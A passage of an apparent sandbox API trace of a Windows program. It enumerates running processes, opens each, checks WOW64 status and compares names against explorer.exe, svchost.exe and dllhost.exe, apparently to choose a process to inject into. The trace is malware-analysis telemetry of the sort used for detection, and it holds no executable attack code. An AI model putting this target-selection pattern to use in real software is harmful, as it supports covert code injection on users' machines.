szExeFile="wininit.exe")) returned 1 [0180.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0180.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0180.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0180.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0180.338] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0180.338] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0180.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0180.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0180.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0180.340] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0180.340] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0180.341] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0180.341] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0180.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0180.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0180.343] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0180.343] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.343] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.343] CloseHandle (hObject=0xec) returned 1 [0180.343] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0180.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0180.344] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.344] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.344] CloseHandle (hObject=0xec) returned 1 [0180.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0180.345] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0180.345] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0180.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0180.346] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.346] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.346] CloseHandle (hObject=0xec) returned 1 [0180.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0180.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0180.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0180.346] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0180.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0180.346] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.346] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.347] CloseHandle (hObject=0xec) returned 1 [0180.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0180.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0180.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0180.347] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0180.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0180.347] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.347] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.347] CloseHandle (hObject=0xec) returned 1 [0180.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0180.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0180.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0180.347] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0180.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0180.348] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.348] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.348] CloseHandle (hObject=0xec) returned 1 [0180.348] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0180.348] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0180.348] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0180.348] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0180.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0180.348] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.349] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.349] CloseHandle (hObject=0xec) returned 1 [0180.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0180.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0180.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0180.349] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0180.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0180.349] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.349] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.349] CloseHandle (hObject=0xec) returned 1 [0180.349] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0180.349] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0180.349] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0180.349] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0180.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0180.350] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.350] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.350] CloseHandle (hObject=0xec) returned 1 [0180.350] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0180.350] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0180.350] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0180.350] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0180.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0180.351] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.351] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.351] CloseHandle (hObject=0xec) returned 1 [0180.351] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0180.351] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0180.351] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0180.351] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0180.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0180.351] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.351] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.351] CloseHandle (hObject=0xec) returned 1 [0180.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0180.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0180.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0180.351] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0180.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0180.352] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.352] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.352] CloseHandle (hObject=0xec) returned 1 [0180.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0180.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0180.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0180.352] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0180.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0180.353] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.353] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.353] CloseHandle (hObject=0xec) returned 1 [0180.353] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0180.353] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0180.353] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0180.353] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0180.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0180.353] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.353] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.353] CloseHandle (hObject=0xec) returned 1 [0180.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0180.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0180.353] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0180.353] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0180.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0180.354] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.354] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.354] CloseHandle (hObject=0xec) returned 1 [0180.354] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0180.354] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0180.354] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0180.354] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0180.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0180.355] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.355] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.355] CloseHandle (hObject=0xec) returned 1 [0180.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0180.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0180.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0180.355] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0180.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0180.355] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.355] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.355] CloseHandle (hObject=0xec) returned 1 [0180.355] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0180.355] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0180.355] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0180.355] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0180.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0180.356] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.356] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.356] CloseHandle (hObject=0xec) returned 1 [0180.356] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0180.356] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0180.356] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0180.356] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0180.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0180.357] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.357] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.357] CloseHandle (hObject=0xec) returned 1 [0180.357] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0180.357] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0180.357] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0180.357] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0180.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0180.357] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.357] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.357] CloseHandle (hObject=0xec) returned 1 [0180.357] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0180.357] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0180.357] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0180.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0180.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0180.358] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.358] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.358] CloseHandle (hObject=0xec) returned 1 [0180.358] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0180.358] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0180.358] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0180.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0180.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0180.359] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.359] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.359] CloseHandle (hObject=0xec) returned 1 [0180.359] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0180.359] 